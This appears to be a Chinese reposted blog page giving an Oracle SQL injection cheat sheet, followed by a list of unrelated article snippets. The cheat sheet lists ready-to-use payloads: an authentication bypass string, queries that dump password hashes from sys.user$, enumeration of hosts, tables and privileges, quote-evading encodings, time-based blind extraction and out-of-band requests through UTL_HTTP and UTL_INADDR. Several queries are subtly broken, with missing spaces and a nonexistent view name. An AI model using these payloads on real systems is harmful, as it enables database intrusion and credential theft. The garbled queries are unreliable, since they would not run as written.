oracle text类型_数据库的一些注入技巧Oracle

65ed22e060ce23ec636d0c72729327fa.png

060d35156410de0d1a7a797a66e7b41a.png

默认数据库

SYSTEM

SYSAUX

注释

--

SELECT * FROM Users WHERE username = '' OR1=1 --' AND password = '';

查询版本信息

SELECT banner FROM v$version WHERE banner LIKE 'Oracle%';

SELECT banner FROM v$version WHERE banner LIKE 'TNS%';

SELECT version FROM v$instance;

数据库凭证

SELECT username FROM all_users;

支持所有版本

SELECT name, password from sys.user$;

高权限, <= 10g

SELECT name, spare4 from sys.user$;

高权限, <= 11g

查询数据库信息

查询当前库

SELECT name FROM v$database;

SELECT  instance_name FROM v$instance

SELECT  global_name FROM global_name

SELECT  SYS.DATABASE_NAME FROM DUAL

用户数据库

SELECT DISTINCT owner FROM  all_tables;

主机名称

SELECT host_name FROM v$instance; (Privileged)

SELECT UTL_INADDR.get_host_name FROM dual;

SELECT UTL_INADDR.get_host_name('10.0.0.1') FROM dual;

SELECT UTL_INADDR.get_host_address FROM dual;

查询表和列

查询表

SELECT table_name FROM  all_tables;

查询列

SELECT column_name FROMall_tab_columns;

从列中查询表

SELECT column_name FROM all_tab_columns WHEREtable_name = 'Users';

从表中查询列

SELECT table_name FROMall_tab_tables WHERE column_name = 'password';

查询多个表信息

SELECT RTRIM(XMLAGG(XMLELEMENT(e,  table_name || ',')).EXTRACT('//text()').EXTRACT('//text()') ,',') FROM  all_tables;

避免使用引号

SELECT 0x09120911091 FROM dual;

Hex编码

SELECT CHR(32)||CHR(92)||CHR(93) FROM dual;

CHR() 函数

字符串拼接

SELECT 'a'||'d'||'mi'||'n' FROM  dual;

条件语句

SELECT CASE WHEN 1=1 THEN 'true'  ELSE 'false' END FROM dual

时间注入

SELECTUTL_INADDR.get_host_address('non-existant-domain.com') FROM dual;

AND (SELECT COUNT(*) FROM all_users t1, all_userst2, all_users t3, all_users t4, all_users t5) > 0 AND 300 >ASCII(SUBSTR((SELECT username FROM all_users WHERE rownum = 1),1,1));

查询权限

SELECT privilege FROM  session_privs;

SELECT  grantee, granted_role FROM dba_role_privs; (Privileged)

DNS带外

SELECT UTL_HTTP.REQUEST('http://localhost') FROM dual;

SELECT UTL_INADDR.get_host_address('localhost.com') FROM dual;

同类型文章赏析

数据库的一些注入技巧-sqlserver

数据库的一些注入技巧-mysql

全文pdf下载地址:

https://www.chinabaiker.com/sql.pdf

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/488773.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

Java 装箱和拆箱

转载于:https://www.cnblogs.com/jiangxifanzhouyudu/p/6629165.html

中科院计算所关于“木兰”语言问题处理情况说明

来源&#xff1a;中国科学院计算技术研究所 近日&#xff0c;网上出现质疑“木兰”语言的信息。我所获知这一情况后高度重视。经所科研道德委员会初步调查&#xff0c;“木兰”语言系我所员工刘雷创办的中科智芯公司研发的面向青少年编程教育的集成化产品&#xff0c;该产品的开…

用python表白代码_如何用Python代码向心爱的姑娘花式表白?

刚好之前用turtle 写过一个https://www.zhihu.com/video/1058809172984004608 这是我当时自学python第二天写的一个&#xff0c;书上讲到了一个turtle模块&#xff0c;可以用来画一些简单的图&#xff0c;自己突发奇想就在纸上大概设计了一下图形&#xff0c;算了算长度后&…

CSS3 Flex布局(伸缩布局盒模型)学习

CSS3 Flex布局&#xff08;伸缩布局盒模型&#xff09;学习 转自&#xff1a;http://www.xifengxx.com/web-front-end/1408.html CSS2定义了四种布局&#xff1a;块布局、行内布局、表格布局盒定位布局。 CSS3引入了一种新的布局模式——Flexbox布局&#xff0c;即伸缩布局盒&a…

qtablewidget添加item不显示_企业微信聊天工具栏可以添加哪些应用?企业微信聊天工具栏不显示是什么原因?...

使用企业微信营销的朋友们应该都知道&#xff0c;企业微信有聊天侧边栏&#xff0c;我们可以在里面添加常用应用&#xff0c;提升运营效率&#xff0c;但是有很多用户反映&#xff0c;自己的企业微信中没有聊天工具栏&#xff0c;这是什么原因呢&#xff1f;这时可能有以下两种…

5G将如何推动未来十年智能城市的发展

来源&#xff1a; IEEE电气电子工程师过去十年的结束标志着部署5G的技术军备竞赛。移动运营商竞相安装网络基础设施&#xff0c;在澳大利亚、中国、韩国、瑞士和美国等数十个国家提供每秒超过1千兆的无线连接。但是&#xff0c;为什么这么匆忙&#xff1f;在2019年的IEEE GLOBE…

接口自动化- 基于 Python

准备工作 这部分其实在谷歌或者百度上搜索下就可以完成的&#xff0c;可是我就是想再啰嗦一遍&#xff0c;说不定有比我更懒的同学呢哈哈~ 第一步 Python的安装配置 打开官网: https://www.python.org/downloads/ 目前官网上已经更新到3.6.1啦&#xff08;这更新速度我是服的&…

vscode c++ 快捷键_[工具篇]提高开发幸福度的VSCode配置[更新中...]

工欲善其事&#xff0c;必先利其器。基于上文把keil与外部编辑器vscode结合一起&#xff0c;达到keil作为编译与调试工具&#xff0c;而vscode作为编辑工具&#xff0c;如今其插件之丰富能与vim媲美&#xff0c;所以现在本文主要介绍本人对VSCode的一些个性配置&#xff0c;以便…

【平行驾驶】王飞跃 | 人工智能与智能汽车:在CPSS中驶向第三轴心时代

来源&#xff1a;车百智库【导读】1月10-12日&#xff0c;2020中国电动汽车百人会论坛在钓鱼台国宾馆隆重召开。青岛智能产业技术研究院院长王飞跃教授受邀出席并作精彩报告&#xff0c;讲述了平行驾驶理论及其当前的矿山无人化应用。王飞跃教授表示&#xff0c;平行驾驶是一种…

poj 3485 区间选点

题目链接&#xff1a;http://poj.org/problem?id3485 题意&#xff1a;X轴上公路从0到L&#xff0c;X轴上下有一些点给出坐标代表村庄&#xff0c;问在公路上最少建几个出口才能使每个村庄到出口的距离不超过D。 以村庄为圆心&#xff0c;半径为 d 画圆&#xff0c;与公路相交…

python return函数_Python函数(一)-return返回值

定义一个函数可以在最后加上return返回值&#xff0c;方便查看函数是否运行完成和返回函数的值 # -*- coding:utf-8 -*- __author__ "MuT6 Sch01aR" def test(): print(test) def test1(): print(test1) return 8 def test2(): print("test2") return 4,t…

吉林大学计算机英语成绩,吉林大学复试出结果,初试分差84分,复试成绩却相差无几!...

原标题&#xff1a;吉林大学复试出结果&#xff0c;初试分差84分&#xff0c;复试成绩却相差无几&#xff01;2021届考研的同学有不少同学已经完成复试&#xff0c;但也有一部分同学还正在忙着准备复试科目&#xff0c;各大高校近期也纷纷发布出了2021年研究生复试的相关工作安…

势如破竹!169 篇论文带你看 BERT 在 NLP 中的 2019 年!

来源&#xff1a; AI科技评论 编译 | JocelynWang编辑 | 丛末2019 年&#xff0c;可谓是 NLP 发展历程中具有里程碑意义的一年&#xff0c;而其背后的最大功臣当属 BERT &#xff01;2018 年底才发布&#xff0c;BERT 仅用 2019 年一年的时间&#xff0c;便以「势如破竹」的姿…

linux运行nodejs一般路径_NodeJS和命令行程序

奇技指南本文来自奇舞周刊公众号&#xff0c;转载请注明出处。作者&#xff1a;刘观宇&#xff0c;360 奇舞团高级前端工程师、技术经理&#xff0c;W3C CSS 工作组成员。源 起植根于Unix系统环境下的程序&#xff0c;很多都把贯彻Unix系统设计的哲学作为一种追求。Unix系统管道…

计算机怎么允许用户安装文件,如何禁止安装某个软件?电脑不允许安装软件的方法...

如何禁止安装某个软件&#xff1f;想要禁止安装软件&#xff0c;可以在组策略中直接启用软件安装规则&#xff0c;但如果只是想要禁用某个软件的安装&#xff0c;则需要用户将该软件的证书进行一个限制&#xff0c;证书不通过&#xff0c;自然无法安装&#xff0c;下面是操作步…

Docker日志收集最佳实践

传统日志处理 说到日志&#xff0c;我们以前处理日志的方式如下&#xff1a; 日志写到本机磁盘上 通常仅用于排查线上问题&#xff0c;很少用于数据分析 需要时登录到机器上&#xff0c;用grep、awk等工具分析 那么&#xff0c;这种方式有什么缺点呢&#xff1f; 第一&#x…

2020年10个诱人的技术里程碑

来源&#xff1a;IEEE电气电子工程师心理控制仿生四肢将首次亮相波士顿马拉松麻省理工学院的研究人员已经开发出一种只用思想控制仿生肢体的方法。2016年首次在人类身上试验。2020年&#xff0c;当在阿富汗失去腿的老兵Brandon Korona用他的新仿生肢参加波士顿马拉松比赛时&…

耶鲁大学计算机科学录取,耶鲁大学计算机科学研究生Offer及录取要求

对于打算去耶鲁大学读研究生的学生来讲&#xff0c;耶鲁大学研究生申请要求及耶鲁大学研究生专业介绍是学生最关心的问题。本文香港介绍耶鲁大学研究生申请要求及耶鲁大学研究生的专业介绍&#xff0c;帮助更多的学生更好的了解耶鲁大学。耶鲁大学研究生申请要求及专业介绍耶鲁…

什么是智能仓储?一文带你彻底搞懂!

来源&#xff1a;机器人网什么是智能仓储&#xff1f;智能仓储是仓库自动化的产物。与智能家居类似&#xff0c;智能仓储可通过多种自动化和互联技术实现。这些技术协同工作以提高仓库的生产率和效率&#xff0c;最大限度地减少人工数量&#xff0c;同时减少错误。在手动仓库中…

assign深拷贝_Object.assign 深拷贝?浅拷贝?

Object.assign() 方法用于将所有可枚举属性的值从一个或多个源对象复制到目标对象。它将返回目标对象。Object.assign(target, ...sources) 【target&#xff1a;目标对象】&#xff0c;【souce&#xff1a;源对象(可多个)】1.如果目标对象中的属性具有相同的键&#xff0c;…